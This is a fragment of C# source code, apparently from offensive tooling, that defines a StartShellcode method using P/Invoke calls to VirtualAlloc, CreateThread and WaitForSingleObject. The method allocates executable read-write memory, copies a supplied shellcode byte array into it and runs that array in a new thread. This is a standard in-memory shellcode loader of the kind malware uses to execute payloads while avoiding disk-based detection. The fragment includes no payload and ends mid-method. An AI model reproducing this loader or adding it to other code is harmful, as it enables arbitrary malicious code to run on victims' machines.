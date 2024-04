[ DllImport ( "kernel32. dll" ) ]

public static extern IntPtr VirtualAlloc ( IntPtr lpAddress , int dwSize , uint flAllocationType , uint flProtect ) ;

[ DllImport ( "kernel32. dll" ) ]

public static extern IntPtr CreateThread ( IntPtr lpThreadAttributes , uint dwStackSize , IntPtr lpStartAddress , IntPtr lpParameter , uint dwCreationFlags , out uint lpThreadId ) ;

[ DllImport ( "kernel32. dll" ) ]

public static extern UInt32 WaitForSingleObject ( IntPtr hHandle , UInt32 dwMilliseconds ) ;

public static void StartShellcode ( byte [ ] shellcode )

{

uint threadId ;

IntPtr alloc = VirtualAlloc ( IntPtr . Zero , shellcode . Length , ( uint ) ( AllocationType . Commit | AllocationType . Reserve ) , ( uint ) MemoryProtection . ExecuteReadWrite ) ;

if ( alloc == IntPtr . Zero ) {

return ;

}

Marshal . Copy ( shellcode , 0 , alloc , shellcode . Length ) ;

IntPtr threadHandle = CreateThread ( IntPtr . Zero , 0 , alloc , IntPtr . Zero , 0 , out threadId ) ;

WaitForSingleObject ( threadHandle , 0xFFFFFFFF ) ;